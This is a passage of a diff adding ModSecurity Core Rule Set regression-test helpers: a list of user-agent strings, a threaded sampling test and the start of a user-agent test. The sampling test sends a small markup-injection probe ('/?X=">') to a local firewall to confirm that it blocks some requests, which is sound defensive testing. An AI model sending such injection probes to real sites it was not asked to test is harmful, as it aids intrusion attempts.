en-US) AppleWebKit/532.8 (KHTML, like Gecko) 
Chrome/4.0.277.0 Safari/532.8 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 +Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M +Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 +Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 +Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 
(X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0 +Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14 +Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15 +Mozilla/5.0 
(X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3 +Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) +Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; +Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) +Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu) +Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0 +Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11 +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 +Mozilla/5.0 (compatible; Konqueror/4.5; 
FreeBSD) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) +Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp) +Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm) +Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) 
AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 
5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 +Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 +NetSurf/1.2 (NetBSD; amd64) +Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 +Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 +Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0 +NokiaN70-1/5.0609.2.0.1 Series60/2.8 
Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 +Offline Explorer/2.5 +Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30 +Opera/7.50 (Windows ME; U) [en] +Opera/7.50 (Windows XP; U) +Opera/7.51 (Windows NT 5.1; U) [en] +Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr) +Opera/9.0 (Macintosh; PPC Mac OS X; U; en) +Opera/9.20 (Macintosh; Intel Mac OS X; U; en) +Opera/9.25 (Windows NT 6.0; U; en) +Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) +Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1 +Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en) +Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0 +Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 +Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 +Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0 +Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00 +Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 +Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 +Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 +Opera/9.80 
(Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 +Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10 +Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 +P3P Validator +POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 +POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 +Peach/1.01 (Ubuntu 8.04 LTS; U; en) +Python-urllib/2.5 +SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 +SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) +SEC-SGHX210/1.0 UP.Link/6.3.1.13.0 +SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SearchExpress +SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 
+SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT100/R101 +SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0 +SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT68/R201A +SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US] +SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 +SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SuperBot/4.4.0.60 (Windows XP) +UCWEB/8.8 (SymbianOS/9.2; U; en-US; NokiaE63) AppleWebKit/534.1 UCBrowser/8.8.0.245 Mobile +UCWEB/8.8 (iPhone; CPU OS_6; en-US)AppleWebKit/534.1 U3/3.0.0 Mobile +User agent: Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36 +Uzbl (Webkit 1.3) (Linux i686 [i686]) +Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 +W3C_Validator/1.305.2.12 libwww-perl/5.64 +W3C_Validator/1.654 +WDG_Validator/1.6.2 +Web Downloader/6.9 +WebCopier v4.6 +WebZIP/3.5 (http://www.spidersoft.com) +Wget/1.9 cvs-stable (Red Hat modified) +Wget/1.9.1 +everyfeed-spider/2.0 (http://www.everyfeed.com) +facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/9.0.2 (Windows; N) +iTunes/9.0.3 (Macintosh; U; Intel 
Mac OS X 10_6_2; en-ca) +libwww-perl/5.820 +msnbot-media/1.1 ( http://search.msn.com/msnbot.htm) +msnbot/0.11 ( http://search.msn.com/msnbot.htm) +msnbot/1.0 ( http://search.msn.com/msnbot.htm) +msnbot/1.1 ( http://search.msn.com/msnbot.htm) +nook browser/1.0 +portalmmm/2.0 N410i(c20;TB) +w3m/0.5.1 +w3m/0.5.1 +wii libnup/1.0 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testSampling.py b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testSampling.py new file mode 100644 index 000000000..e7e1223a4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testSampling.py 
@@ -0,0 +1,46 @@
+from ftw import ruleset, http, errors
+
+"""
+This script assumes that default blocking action is 403
+and sampling is one. It will send a know bad request
+that is expected to be blocked. If sampling is on it
+will only block a certain percentage. We send 1000
+requests to verify this. In order to do this we must
+also turn off IP Reputation blocking.
+SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000"
+"""
+def send_requests(input_data,subiters,result,index):
+ http_ua = http.HttpUA()
+ for i in range(0,subiters):
+ new_index = str(index)+str(i)
+ http_ua.send_request(input_data)
+ result[new_index] = http_ua.response_object.status
+def run_requests(iterations):
+ """Post request with no content-type AND no content-length"""
+ x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X=">',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"})
+ import threading
+ returns = {}
+ threads = []
+ for i in range(5):
+ t = threading.Thread(target=send_requests,args=(x,100, returns,i,))
+ threads.append(t)
+ t.start()
+ for t in threads:
+ t.join()
+ status_not_403 = 0
+ status_403 = 0
+ for status in returns.values():
+ if status == 403:
+ status_403 += 1
+ else:
+ status_not_403 += 1
+ x = (status_403/(len(returns)*1.0))*100
+ y = (status_not_403/(len(returns)*1.0))*100
+ print "403s =", x
+ print "not 403s =", y
+ return (x,y)
+
+def test_sampling():
+ print "running"
+ block,passed = run_requests(100)
+ assert block < 55 and block > 45
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testUserAgents.py b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testUserAgents.py
new file mode 100644
index 000000000..78af92d54
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testUserAgents.py
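Review bot: `run_requests(iterations)` never reads `iterations`: the loop is fixed at `range(5)` threads of 100 requests each, so `test_sampling()`'s `run_requests(100)` sends 500 requests while the module text says 1000. Either derive the per-thread workload from the argument or drop the parameter, and replace the docstring `"""Post request with no content-type AND no content-length"""`, which does not describe the GET request this function builds. The `print "running"` and `print "403s =", x` statements are Python 2 syntax, so the module does not import under Python 3.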
@@ -0,0 +1,37 @@
+from ftw import ruleset, http, errors
+
+"""
+This script reads in a list of popular Useragents and checks to see if it triggers
+It expects 403's to be returned for a rule firing
+"""
+
+def read_useragents(filename):
+ f = open(filename,'r')
+ useragents = [agent.strip() for agent in f.readlines()]
+ return useragents
+
+def run_requests(useragent_list):
+ status_not_403 = 0
+ status_403 = 0
+ for useragent in useragent_list:
+ # get me a counter while i'm waiting
+ if (status_not_403 + status_403)%15 == 0:
+ print("Send",status_not_403 + status_403, "Out of",len(useragent_list))
